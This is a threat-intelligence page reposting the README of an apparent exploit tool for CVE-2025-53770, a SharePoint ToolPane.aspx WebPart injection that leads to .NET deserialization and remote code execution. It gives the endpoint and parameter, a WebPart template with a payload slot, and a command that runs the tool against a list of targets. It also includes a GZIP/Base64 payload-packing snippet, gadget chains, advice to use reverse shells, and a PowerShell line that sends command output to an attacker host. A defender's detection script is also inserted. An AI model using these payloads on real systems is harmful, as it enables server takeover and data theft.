Dark Web Informer - Cyber Threat Intelligence

CVE-2025-53770: SharePoint WebPart Injection Exploit Tool


GitHub: https://github.com/soltanali0/CVE-2025-53770-Exploit


🍕 Exploit tool for SharePoint WebPart Injection via ToolPane.aspx, leading to .NET deserialization and remote code execution (RCE).

Developed by: @GOTOCVE


🌍 Overview

This tool exploits a vulnerability in Microsoft SharePoint (on-premises) that allows authenticated users to abuse the ToolPane.aspx endpoint and inject malicious WebParts containing GZIP-compressed serialized .NET objects.

The vulnerability exists in the handling of the CompressedDataTable property inside the <Scorecard:ExcelDataSet> WebPart. This results in unsafe deserialization using formatters like BinaryFormatter or LosFormatter, enabling arbitrary code execution on the SharePoint server.


⚡ Vulnerability Summary

Component: Microsoft SharePoint (on-premises)
Endpoint: /_layouts/15/ToolPane.aspx
Parameter: MSOTlPn_DWP
Injected Control: <Scorecard:ExcelDataSet CompressedDataTable="...">
Vulnerability: Insecure deserialization (BinaryFormatter, LosFormatter, etc.)
CVE: CVE-2025-53770

🧰 How It Works

  1. An authenticated attacker sends a POST request to:

/_layouts/15/ToolPane.aspx?DisplayMode=Edit

  2. The request includes the parameter MSOTlPn_DWP, containing an injected WebPart XML.
  3. Inside the WebPart, the attacker places a <Scorecard:ExcelDataSet> component whose CompressedDataTable attribute holds a payload that is:
      • a serialized .NET object,
      • encoded in Base64, and
      • compressed using GZIP.
  4. SharePoint automatically inflates and deserializes the object using unsafe formatters.
  5. If the object contains a valid gadget chain (e.g., ObjectDataProvider), arbitrary code is executed on the server.
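The request pattern described in the steps above, turned into a detection check. This is an added example for defenders, not code from the tool or its README: it flags a POST to ToolPane.aspx whose MSOTlPn_DWP form field carries a Scorecard:ExcelDataSet control with a CompressedDataTable value that base64-decodes to GZIP data. The sample requests are constructed, and the blob is a GZIP of placeholder text rather than a serialized .NET object.

```python
import base64
import gzip
import re
from urllib.parse import parse_qs, quote, urlsplit

# Indicators from the write-up above: the ToolPane endpoint, the DisplayMode=Edit
# query, the MSOTlPn_DWP field and the ExcelDataSet CompressedDataTable attribute.
TOOLPANE_RE = re.compile(r"/_layouts/15/toolpane\.aspx$", re.IGNORECASE)
CONTROL_RE = re.compile(
    r'<\s*Scorecard:ExcelDataSet\b[^>]*\bCompressedDataTable\s*=\s*"([^"]*)"', re.IGNORECASE)
GZIP_MAGIC = b"\x1f\x8b"

def looks_like_gzip_b64(value: str) -> bool:
    """True if the attribute value base64-decodes to bytes starting with the GZIP magic."""
    try:
        raw = base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return raw.startswith(GZIP_MAGIC)

def inspect_request(method: str, target: str, body: str) -> list[str]:
    """Return the indicators found in one HTTP request, in escalating order."""
    findings = []
    parts = urlsplit(target)
    if method.upper() != "POST" or not TOOLPANE_RE.search(parts.path):
        return findings  # ordinary page loads of ToolPane.aspx are not flagged
    findings.append("post_to_toolpane")
    if "edit" in [v.lower() for v in parse_qs(parts.query).get("DisplayMode", [])]:
        findings.append("displaymode_edit")
    for webpart_xml in parse_qs(body, keep_blank_values=True).get("MSOTlPn_DWP", []):
        findings.append("msotlpn_dwp_present")
        match = CONTROL_RE.search(webpart_xml)
        if match:
            findings.append("exceldataset_compresseddatatable")
            if looks_like_gzip_b64(match.group(1)):
                findings.append("gzip_b64_blob")  # highest-severity alert
    return findings

# Constructed sample traffic (not captured from any real system); the blob is a
# GZIP of placeholder text, not a serialized .NET object.
SAMPLE_BLOB = base64.b64encode(gzip.compress(b"placeholder, not a gadget chain")).decode()
SAMPLE_XML = ('<asp:UpdateProgress ID="UpdateProgress1" runat="server"><ProgressTemplate>'
              f'<Scorecard:ExcelDataSet CompressedDataTable="{SAMPLE_BLOB}" runat="server" />'
              '</ProgressTemplate></asp:UpdateProgress>')
SUSPICIOUS = ("POST", "/_layouts/15/ToolPane.aspx?DisplayMode=Edit",
              "MSOTlPn_DWP=" + quote(SAMPLE_XML) + "&__VIEWSTATE=constructed")
EDIT_ONLY = ("POST", "/_layouts/15/ToolPane.aspx?DisplayMode=Edit", "__VIEWSTATE=constructed")
BENIGN_GET = ("GET", "/_layouts/15/ToolPane.aspx?DisplayMode=Edit", "")
```

`inspect_request(*SUSPICIOUS)` returns all five indicators, `EDIT_ONLY` returns only the first two, and the GET returns nothing, so a monitor can alert on `gzip_b64_blob` and merely log the rest.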

🔧 Requirements

  • Python 3.x
  • Required Python modules:

pip install -r requirements.txt

  • A Base64 GZIP-compressed .NET deserialization payload (see next section)

📂 Example Usage

python3 exploit.py -t targets.txt --file payload.txt --proxy http://127.0.0.1:8080

Arguments:

-t / --targets: File containing SharePoint target URLs (one per line)
--file: File containing the base64 GZIP-compressed payload
--proxy: (Optional) Burp/ZAP proxy for interception/debugging

💥 Payload Structure

The payload must be:

  • .NET DataSet or similar gadget chain
  • Serialized using LosFormatter or BinaryFormatter
  • Base64-encoded
  • GZIP-compressed
  • Embedded inside this WebPart structure:

<asp:UpdateProgress ID="UpdateProgress1" runat="server" AssociatedUpdatePanelID="upTest">
    <ProgressTemplate>
        <div class="divWaiting">
            <Scorecard:ExcelDataSet CompressedDataTable="{PAYLOAD}" DataTable-CaseSensitive="false" runat="server" />
        </div>
    </ProgressTemplate>
</asp:UpdateProgress>


Generating Payloads

✅ Step 1: Generate the base64 serialized object

LosFormatter is a specialized formatter in ASP.NET, commonly used in contexts like CompressedDataTable — which is exactly what SharePoint uses inside its WebParts. I'm currently working on building a tool similar to ysoserial, tailored specifically for this case, to make the exploitation process easier for you.


✅ Step 2: Compress with GZIP

import gzip, base64

# payload.b64 holds the Base64 text of the serialized object from Step 1
with open("payload.b64", "rb") as f:
    decoded = base64.b64decode(f.read())

# GZIP-compress the raw bytes, then Base64-encode the result for CompressedDataTable
compressed = gzip.compress(decoded)
print(base64.b64encode(compressed).decode())

Save the final output into payload.txt — this is what you give to the exploit script.

🧵 Compatible Gadget Chains

You can use any gadget chain supported by your serialization tool. Common examples include:

  • System.Data.DataSet
  • System.Data.Services.Internal.ExpandedWrapper
  • System.Web.UI.LosFormatter
  • System.Windows.Data.ObjectDataProvider

📡 Notes on Output / Echo

This vulnerability does not return command output like ipconfig in the HTTP response. If you want output:

  • Use reverse shell payloads
  • Or redirect output via Invoke-WebRequest:

powershell -c "ipconfig | Invoke-WebRequest -Uri http://your-ip:8000/?d=$(Get-Content -Raw)"


This tool is provided for educational and authorized security testing purposes only.

Do not use this tool against systems without explicit permission. Misuse may be illegal and unethical.


🌐 More CVEs & Deep Dives

📢 Join @GOTOCVE on Telegram for:

  • 🔍 Weekly CVE breakdowns
  • 🧠 In-depth exploit analysis
  • 🔴 Red & Blue Team detection tips
  • 📦 Real-world PoCs and threat simulations

Stay informed, stay sharp. ⚡
